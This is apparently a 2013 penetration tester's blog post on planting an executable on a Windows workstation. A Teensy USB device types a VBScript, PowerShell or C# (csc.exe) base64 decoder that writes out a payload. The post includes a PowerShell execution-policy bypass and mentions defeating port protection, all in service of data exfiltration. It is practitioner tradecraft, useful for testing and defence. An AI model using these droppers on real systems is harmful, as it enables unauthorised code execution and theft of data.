Tuesday, July 30, 2013

Binary deployment with VBScript, PowerShell or .Net csc.exe compiler

Preface

About six months ago I had an engagement where my task was to exfiltrate data from a workstation on some sort of storage media. Given that I already knew about such techniques for Arduino [1] and Teensy [2], I thought it would be a great opportunity to try them out in real life too.

As a first step I had to bypass a host port protection solution, which was not easy, but I managed to find a way to defeat it. After that, I was good to go to use a Teensy to deploy the exiltrator binary from [2].

And this is where all the troubles have started. In the original blog post [2], the Teensy would type out the exfil.vbs VBScript that has the exiltrator binary in base64 encoded format. But when I tried to execute the VBScript, I got the following error message:

Sript:  C:\...\exfil.vbs
Line:   4
Char:   1
Error:  Error Parsing '<base64_stuff_here>' as bin.base64 datatype.

Code :  80004005
Source: msxml3.dll

It turned out that the Windows XP system where I tried to do the exfiltration was unpatched, having a bug in msxml3.dll which prevented me from converting the base64 encoded payload into binary. :D (seems like there are patches you shouldn't apply...)

But I did not panic, because very thoughtfully, the machine had PowerShell installed (I know, right? :) ), so I re-wrote the VBScript in PowerShell, but I was stupid, and I did not thought (but probably I should have) that PowerShell is using the very same freaking msxml3.dll for base64 decoding...

Still no need to panic, because whenever a Windows box has .Net Framework installed (and I think most of them do have), by default it is shipped with a nice command line compiler called csc.exe so you can write a C# code to convert a base64 payload into binary. :)

Of course, normally you need just one of these methods, but as you can see, sometimes only one of them will work, and it's handy to know each of them.

Binary deployment

VBScript


So the original exfil.vbs script is this:

Dim a,b
Set a=CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64")
a.dataType="bin.base64"
a.text="<PASTE_BASE64_ENCODED_PAYLOAD_HERE>"
Set b=CreateObject("ADODB.Stream")
b.Type=1
b.Open
b.Write a.nodeTypedValue
b.SaveToFile "payload.exe",2

Just execute it, and you will have your payload.exe next to the script.

PowerShell


Second version is in PowerShell:

Add-Type -an System
Add-Type -an System.Windows.Forms 
$e = "<PASTE_BASE64_ENCODED_PAYLOAD_HERE>"
$c = [System.Convert]::FromBase64String($e)
[System.IO.File]::WriteAllBytes("$(get-location)\payload.exe", $c)

To execute the script, you can use any PowerShell script execution restriction bypass method you want. My favorite one is this:

PS C:\temp> gc .\script.ps1 | iex

Where the cmdlets are:
  • gc is Get-Content to read the contents of the PowerShell script
  • iex is Invoke-Expression to execute the script line-by-line (so basically execute the script :) )

.Net C# compiler


Last but not least, you can use csc.exe that is shipped along with .NET Framework.

The following C# needs a text file with the base64 encoded payload in it, but you can modify it to have it in a variable. I got this from a colleague and I was lazy to change it, so I just put the base64 payload into a comment and copied it manually into a file.

You can also make the variable names shorter, so it takes less time for the Teensy to type in, but I think the most time consuming is to type in the base64 payload.

using System;
using System.IO;

// <PASTE_BASE64_ENCODED_PAYLOAD_HERE_AND_PLACE_IT_INTO_payload.txt>

class Base64Decoder
{
   static void Main(string[] args)
   {
      StreamReader reader = new StreamReader(args[0]);
      string line = reader.ReadLine();
      reader.Close();

      byte[] toDecodeByte = Convert.FromBase64String(line);

      FileStream outfileStream = new FileStream(args[1], FileMode.Create);
      outfileStream.Write(toDecodeByte, 0, toDecodeByte.Length);
      outfileStream.Close();
   }
}

Compile it, and convert the payload:

C:\temp>%Systemroot%\Microsoft.NET\Framework\v3.5\csc /out:C:\temp\d64.exe c:\temp\d64.cs
Microsoft (R) Visual C# 2008 Compiler version 3.5.30729.5420
for Microsoft (R) .NET Framework version 3.5
Copyright (C) Microsoft Corporation. All rights reserved.

C:\temp>d64.exe payload.txt payload.exe

And that's all! :) Three easy ways to deploy a binary on a Windows box!

Hardware

I quick update, since I forgot to write about the HW I used. It's plain simple actually, just a Teensy 2.0 with a Teensy SD Adaptor, connected to the PC with an USB A type to USB MINI-B type cable.

Every detail on connecting a Teensy with the SD Adaptor can be found in my "Making a USB flash drive HW Trojan" blog post, but just as a quick recap, here is the picture for the wiring:


References

[1] Leaking data using DIY USB HID device

[2] Data exfiltration using a USB keyboard

No comments :

Post a Comment